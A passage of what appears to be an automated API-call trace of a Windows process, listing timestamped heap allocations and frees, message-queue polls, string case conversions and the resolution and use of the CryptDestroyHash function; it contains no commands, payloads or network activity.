(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.970] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.971] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.971] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.971] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.971] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.973] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.974] CryptDestroyHash (hHash=0xaa5660) returned 1 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: 